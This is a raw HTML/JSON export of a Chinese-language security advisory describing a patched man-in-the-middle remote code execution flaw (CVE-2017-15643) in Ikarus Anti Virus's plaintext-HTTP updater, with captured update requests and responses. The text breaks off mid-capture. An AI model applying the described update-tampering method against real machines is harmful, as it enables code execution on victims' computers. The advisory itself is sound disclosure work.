{"id":10623,"date":"2017-11-27T14:19:10","date_gmt":"2017-11-27T22:19:10","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4395\/"},"modified":"2017-11-27T14:19:10","modified_gmt":"2017-11-27T22:19:10","slug":"news-4395","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4395\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a\u2013Ikraus Anti Virus \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 07:50:39 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3542\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3542');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><\/p>\n<p>\u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Ikraus Anti Virus 2.16.7\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002<\/p>\n<p>KARUS anti.virus\u201c\u53ef\u4ee5\u4fdd\u62a4\u4f60\u7684\u4e2a\u4eba\u6570\u636e\u548cPC\u514d\u53d7\u5404\u79cd\u6076\u610f\u8f6f\u4ef6\u7684\u5165\u4fb5\u3002\u6b64\u5916\uff0c\u53cd\u5783\u573e\u90ae\u4ef6\u6a21\u5757\u53ef\u4ee5\u4fdd\u62a4\u7528\u6237\u514d\u53d7\u5783\u573e\u90ae\u4ef6\u548c\u7535\u5b50\u90ae\u4ef6\u4e2d\u7684\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u3002 \u9009\u62e9\u83b7\u5956\u7684IKARUS\u626b\u63cf\u5f15\u64ce\uff0c\u53ef\u4ee5\u6709\u6548\u4fdd\u62a4\u81ea\u5df1\u514d\u53d7\u7f51\u7edc\u72af\u7f6a\u5206\u5b50\u7684\u4fb5\u5bb3\u3002 IKARUS\u662f\u4e16\u754c\u4e0a\u6700\u597d\u7684\u626b\u63cf\u5f15\u64ce\uff0c\u5b83\u6bcf\u5929\u90fd\u5728\u68c0\u6d4b\u672a\u77e5\u548c\u5df2\u77e5\u7684\u5a01\u80c1\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><\/p>\n<p>\u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><\/p>\n<p>\u66f4\u65b0\u4e00<\/p>\n<p>CVE: CVE-2017-15643<\/p>\n<p>\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u8fd9\u4e9b\u6f0f\u6d1e\u7684\u8865\u4e01\u3002\u83b7\u53d6\u66f4\u591a\u4fe1\u606f\uff1a<br \/> https:\/\/www.ikarussecurity.com\/about-ikarus\/security-blog\/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001\/<\/p>\n<p><span id=\"more-3542\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><\/p>\n<p>\u7f51\u7edc\u653b\u51fb\u8005\uff08\u4e2d\u95f4\u4eba\u653b\u51fb\uff09\u53ef\u4ee5\u5728\u8fd0\u884cIkraus\u53cd\u75c5\u6bd2\u8f6f\u4ef6\u7684\u8ba1\u7b97\u673a\u4e0a\u5b9e\u73b0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002<\/p>\n<p>Windows\u7248\u7684Ikarus AV\u4f7f\u7528\u660e\u6587HTTP\u548cCRC32\u6821\u9a8c\u8fdb\u884c\u66f4\u65b0\uff0c\u4ee5\u53ca\u7528\u4e8e\u9a8c\u8bc1\u4e0b\u8f7d\u6587\u4ef6\u7684\u4e00\u4e2a\u66f4\u65b0\u503c\u3002<\/p>\n<p>\u53e6\u5916\uff0cikarus\u68c0\u67e5\u66f4\u65b0\u7248\u672c\u53f7\uff0c\u901a\u8fc7\u589e\u52a0\u66f4\u65b0\u7684\u7248\u672c\u53f7\uff0c\u4ee5\u63a8\u52a8\u66f4\u65b0\u8fdb\u7a0b\u8fdb\u884c\u66f4\u65b0\u3002<\/p>\n<p>\u5728ikarus\u4e2d\u6267\u884c\u66f4\u65b0\u7684\u53ef\u6267\u884c\u6587\u4ef6\u662fguardxup.exe<\/p>\n<p>guardxup.exe\uff0c\u901a\u8fc7\u7aef\u53e380\uff0c\u53d1\u9001\u66f4\u65b0\u8bf7\u6c42\u5982\u4e0b\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d6051f968814206\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  GET \/cgi-bin\/virusutilities.pl?A=7534ED66&amp;B=6.1.1.0.11.1.256.7601&amp;C=1005047.2013019.2001016.98727&amp;F=4.5.2%3bO=0%3bSP=0&amp;E=WD-194390-VU HTTP\/1.1  Accept: *\/*  User-Agent: virusutilities(6.1,0,1005047)  Host: updates.ikarus.at  Connection: close  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>\u670d\u52a1\u5668\u54cd\u5e94\u5982\u4e0b\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d60526863157776\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  HTTP\/1.1 200 OK  Date: Sun, 23 Oct 2016 04:51:05 GMT  Server: Apache\/2.4.10 (Debian) mod_perl\/2.0.9dev Perl\/v5.20.2  Content-Disposition: inline; filename=virusutilities  Content-Length: 306  Connection: close  Content-Type: text\/plain; charset=ISO-8859-1    &lt;url&gt;  \tfull\thttp:\/\/mirror04.ikarus.at\/updates\/  \tdiff\thttp:\/\/mirror06.ikarus.at\/updates\/  &lt;\/url&gt;  &lt;up&gt;  \tantispam_w64\t001000076  \tantispam\t001000076  \tupdate\t001005047  \tvirusutilities\t002013019  \tt3modul_w64\t002001016  \tt3modul\t002001016  \tsdb\t000007074  \tt3sigs\t000098727  &lt;\/up&gt;  &lt;dependence&gt;  \tt3modul  &lt;\/dependence&gt;  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60526863157776-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60526863157776-27\">27<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-2\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-3\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Sun<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Oct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">51<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-4\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2.4.10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Debian<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mod_perl<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2.0.9dev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Perl<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">v5<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">20.2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">virusutilities<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">306<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-7\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ISO<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8859<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-10\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">full\t<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/mirror04.ikarus.at\/updates\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">diff\t<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/mirror06.ikarus.at\/updates\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-13\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-14\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">up<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">antispam<\/span><span class=\"crayon-sy\">_<\/span>w64<span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">001000076<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">antispam<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">001000076<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">update<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">001005047<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">virusutilities<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">002013019<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">t3modul<\/span><span class=\"crayon-sy\">_<\/span>w64<span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">002001016<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">t3modul<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">002001016<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-21\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">sdb<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">000007074<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-22\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">t3sigs<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">000098727<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-23\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">up<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-24\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">dependence<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-25\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">t3modul<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60526863157776-26\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">dependence<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60526863157776-27\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>\u901a\u8fc7\u4ee3\u7406\uff0c\u6211\u4eec\u53ef\u4ee5\u4fee\u6539\u54cd\u5e94\uff0c\u5c06\u201cupdate\u201d\u503c\u52a01\uff0c\u5e76\u5c06\u54cd\u5e94\u8f6c\u53d1\u7ed9\u5ba2\u6237\u7aef\u3002<\/p>\n<p>\u7136\u540e\uff0c\u5ba2\u6237\u7aef\u5c06\u901a\u8fc7\u6b64URL\u8bf7\u6c42\u66f4\u65b0\uff1ahttp:\/\/mirror04.ikarus.at\/updates\/guardxup001005048.full<\/p>\n<p>ikarus\u670d\u52a1\u5668\u5c06\u8fd4\u56de404\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f5d60529924886288\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  HTTP\/1.1 404 Not Found  Server: nginx\/1.6.2  Date: Sun, 23 Oct 2016 04:53:05 GMT  Content-Type: text\/html  Content-Length: 168  Connection: close    &lt;html&gt;  &lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;  &lt;body bgcolor=&#8221;white&#8221;&gt;  &lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;  &lt;hr&gt;&lt;center&gt;nginx\/1.6.2&lt;\/center&gt;  &lt;\/body&gt;  &lt;\/html&gt;  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60529924886288-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60529924886288-16\">16<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-2\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">404<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Found<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60529924886288-3\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nginx<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.6.2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60529924886288-4\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Sun<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Oct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-h\"> <\/span><span 